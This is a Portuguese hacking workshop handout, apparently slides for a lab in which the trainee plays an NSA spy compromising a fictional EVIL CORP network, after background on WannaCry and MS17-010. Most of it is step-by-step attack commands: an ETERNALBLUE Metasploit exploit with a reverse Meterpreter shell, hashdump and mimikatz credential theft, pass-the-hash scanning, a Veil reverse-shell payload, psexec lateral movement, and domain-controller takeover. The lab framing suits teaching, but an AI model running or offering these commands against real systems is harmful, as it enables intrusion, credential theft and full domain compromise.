NSA HACKING
Washington Silas
washington.souza@gemina.io Jonathan Messias
Introdução
O que é o WannaCry?
O ransomware WannaCry visa redes que usam SMBv1, um protocolo que ajuda PCs a se comunicarem com impressoras e outros dispositivos conectados na rede. Essa versão, que vem de 2003, deixa computadores expostos a hackers, uma vulnerabilidade chamada MS17-010. A Microsoft lançou um patch para corrigi-la em março de 2017 para as versões do Windows que ainda têm suporte, mas qualquer pessoa que não tenha instalado o patch tornou-se um alvo fácil para os hackers que criaram o WannaCry.
Quais são os alvos do WannaCry?
Durante um grande surto de ransomware em maio de 2017, Rússia, China, Ucrânia, Taiwan, Índia e Brasil foram os países mais afetados. O WannaCry afetou tanto pessoas quanto organizações governamentais, hospitais, universidades, empresas ferroviárias, firmas de tecnologia e operadoras de telecomunicações em mais de 150 países. O National Health Service do Reino Unido, Deutsche Bahn, a empresa espanhola Telefónica, FedEx, Hitachi e Renault estavam entre as vítimas.
Introdução
De onde vem o WannaCry?
Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados no arsenal que vazou da NSA (ETERNALBLUE e DOUBLEPULSAR). Eles também
encontraram evidência que liga o surto de ransomware ao Grupo Lazarus da Coreia do Norte.
Em 2014, os hackers (conhecidos por usar bitcoin em suas operações) apagaram mais de um terabyte de dados do banco de dados da Sony Pictures. Eles também criaram um backdoor maligno em 2015 e se envolveram em um ataque cibernético de US$ 81 milhões no Banco Central de Bangladesh em 2016.
Objetivo
[*] Nesta oficina você vai ter os primeiros contatos com Hacking sendo um espião da NSA com a missão de invadir o computador de um executivo da empresa EVIL CORP, e através dessa invasão chegar até o
servidor principal e controlar toda a empresa.
[*] Este material está dividido em 3 partes, sendo elas:
PARTE 1 - Comprometer o computador da recepcionista da EVIL CORP, coletar a hash do administrador
local e pegar a credencial em texto puro de um usuário de domínio.
PARTE 2 - Fazer movimentação lateral para o computador do CEO da EVIL CORP e pegar as credenciais em
texto puro de um administrador de domínio.
PARTE 3 - Conseguir fazer acesso remoto no servidor AD, criar um usuário com privilégios administrativos e
01. Logar no Kali-NSA com o usuário root e a senha H@ck3rNS@.
02. Abra um terminal e rode o nmap em toda a rede para procurar algum alvo vulnerável ao WannaCry.
nmap -v -n -Pn -sS -sV --script=smb-vuln-ms17-010.nse 192.168.15.0/24 -p 445
Você deverá ver o retorno do nmap do seu alvo vulnerável como a imagem a seguir:
Fase 01 - Reconhecimento
03. Verifique a arquitetura do Sistema Operacional do alvo, para saber qual payload usar na exploração.
01. Acesse o Metasploit, framework de exploração utilizado pela NSA com o objetivo de comprometer os
seus alvos.
msfconsole
02. Vamos usar o exploit ETERNALBLUE para fazer o ataque, o mesmo usado pelo WannaCry, mas no lugar
de inserir um ransomware vamos obter controle do alvo.
use exploit/windows/smb/eternalblue_doublepulsar
03. Veja as informações que o exploit necessita para a exploração.
show options
04. Fazer a configuração do exploit.
set RHOST <IP DO ALVO> set PROCESSINJECT lsass.exe set TARGETARCHITECTURE x64
set WINEPATH /var/lib/veil/wine/drive_c/
05. Selecionar um payload de shell reverso e configure.
set PAYLOAD windows/x64/meterpreter/reverse_https set LHOST <IP KALI>
set LPORT 443
Fase 02 - Preparando o Armamento
01. Executar o exploit.
exploit
02. Migrar para o processo lsass.
migrate -N lsass.exe getsystem
03. Coletar informações da vitima.
sysinfo
04. Extrair hashs dos usuários.
hashdump
05. Extrair credenciais dos usuários usando o mimikatz.
load kiwi creds_all
Fase 03 - Exploração
Exploração realizada com sucesso:
01. Busque máquinas na rede que você possa se autenticar com a hash capturada.
cme smb 192.168.15.0/24 -u administrator -H <HASH> --local-auth
02. Gere um payload em GO de shell reverso no veil.
veil use 1 use 15
set LHOST <IP KALI> set LPORT 4444
03. Verifique se as informações estão corretas depois gere o payload.
options generate
Fase 01 - Movimentação Lateral
[*] De um nome de sua preferência para o payload.
03. Ative o listening no metasploit.
use multi/handler
set PAYLOAD windows/meterpreter/reverse_https set LHOST <SEU IP>
set LPORT 4444 exploit -j -z
04. Faça movimentação lateral para a máquina do CEO usando o psexec.py e o payload gerado por você.
cd /root/Tools
python psexec.py -hashes <HASH> administrator@<IP ALVO> -c /var/lib/veil/output/compiled/payload.exe
Fase 01 - Movimentação Lateral
05. Faça o procedimento de migração de processo e captura de senhas novamente. sessions X migrate -N winlogon.exe getsystem load kiwi creds_all
Fase 01 - Movimentação Lateral
Após migrar de processo e carregar o módulo do mimikatz, você vai ver uma tela como a imagem ao lado.
01. Acesse o Servidor AD com o usuário capturado na máquina da recepcionista.
rdesktop <IP SERVIDOR> -d <DOMINIO> -u <USUARIO>
02. Coloque a senha e obtenha acesso ao servidor.
03. Siga esses passos para criar um usuário com acesso total a EVIL CORP.
Start -> Windows Administrative Tools -> Active Directory Users and Computers
04. Coloque o usuário e senha capturados na máquina do CEO.
05. Clique no nome do domínio, em seguida clique com o botão direito em Domain Controllers, New, User.
